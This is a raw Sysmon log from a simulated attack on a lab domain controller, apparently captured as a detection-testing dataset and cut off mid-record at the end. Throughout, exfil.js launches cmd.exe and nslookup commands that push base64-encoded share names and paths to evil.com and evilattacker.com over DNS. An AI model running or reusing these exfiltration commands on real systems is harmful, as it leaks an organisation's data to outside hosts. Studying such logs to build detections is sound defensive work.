2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072628Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:51.600{A8622C2F-5B3B-6078-330F-00000000AE01}7044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B3B-6078-310F-00000000AE01}4244C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpqoo.tmp 2>&1 154100x800000000000000072617Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:51.570{A8622C2F-5B3B-6078-310F-00000000AE01}4244C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpqoo.tmp 
2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072591Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:49.265{A8622C2F-5B39-6078-300F-00000000AE01}5800C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B39-6078-2E0F-00000000AE01}4804C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlolvkw.tmp 2>&1 154100x800000000000000072580Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:49.233{A8622C2F-5B39-6078-2E0F-00000000AE01}4804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlolvkw.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072570Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:48.668{A8622C2F-5B38-6078-2D0F-00000000AE01}4180C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B38-6078-2B0F-00000000AE01}4140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnzpdo.tmp 2>&1 154100x800000000000000072559Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:48.638{A8622C2F-5B38-6078-2B0F-00000000AE01}4140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnzpdo.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072481Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:39.217{A8622C2F-5B2F-6078-2A0F-00000000AE01}2828C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B2F-6078-280F-00000000AE01}6268C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlheedj.tmp 2>&1 154100x800000000000000072470Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:39.187{A8622C2F-5B2F-6078-280F-00000000AE01}6268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlheedj.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:22.208{A8622C2F-5B1E-6078-270F-00000000AE01}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072401Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:21.531{A8622C2F-5B1D-6078-260F-00000000AE01}5952C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B1D-6078-240F-00000000AE01}4772C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > 
C:\Users\ADMINI~1\AppData\Local\Temp\2\nliozn.tmp 2>&1 154100x800000000000000072390Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:21.502{A8622C2F-5B1D-6078-240F-00000000AE01}4772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliozn.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072378Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:20.653{A8622C2F-5B1C-6078-230F-00000000AE01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072364Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:19.986{A8622C2F-5B1B-6078-220F-00000000AE01}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072355Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:19.304{A8622C2F-5B1B-6078-210F-00000000AE01}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072341Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:17.553{A8622C2F-5B19-6078-200F-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:26:16.871{A8622C2F-5B18-6078-1F0F-00000000AE01}6164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072318Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:16.204{A8622C2F-5B18-6078-1E0F-00000000AE01}1736C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000072287Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:11.667{A8622C2F-5B13-6078-1D0F-00000000AE01}4804C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B13-6078-1B0F-00000000AE01}6084C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvsbc.tmp 2>&1 154100x800000000000000072276Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:11.636{A8622C2F-5B13-6078-1B0F-00000000AE01}6084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvsbc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:11.093{A8622C2F-5B13-6078-1A0F-00000000AE01}920C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B13-6078-180F-00000000AE01}2196C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsm.tmp 2>&1 154100x800000000000000072251Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:11.062{A8622C2F-5B13-6078-180F-00000000AE01}2196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:09.029{A8622C2F-5B11-6078-170F-00000000AE01}7036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5B10-6078-150F-00000000AE01}4832C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllsoey.tmp 2>&1 154100x800000000000000072216Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:26:08.999{A8622C2F-5B10-6078-150F-00000000AE01}4832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllsoey.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000072155Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:51.435{A8622C2F-5AFF-6078-140F-00000000AE01}2488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AFF-6078-120F-00000000AE01}4180C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxoqg.tmp 2>&1 154100x800000000000000072144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:51.405{A8622C2F-5AFF-6078-120F-00000000AE01}4180C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvxoqg.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000072037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:38.946{A8622C2F-5AF2-6078-110F-00000000AE01}5212C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AF2-6078-0F0F-00000000AE01}6492C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpexlf.tmp 2>&1 154100x800000000000000072024Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:38.916{A8622C2F-5AF2-6078-0F0F-00000000AE01}6492C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpexlf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071970Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:23.874{A8622C2F-5AE3-6078-0E0F-00000000AE01}4376C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5AE3-6078-0C0F-00000000AE01}6044C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbxxy.tmp 2>&1 154100x800000000000000071959Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:25:23.844{A8622C2F-5AE3-6078-0C0F-00000000AE01}6044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command 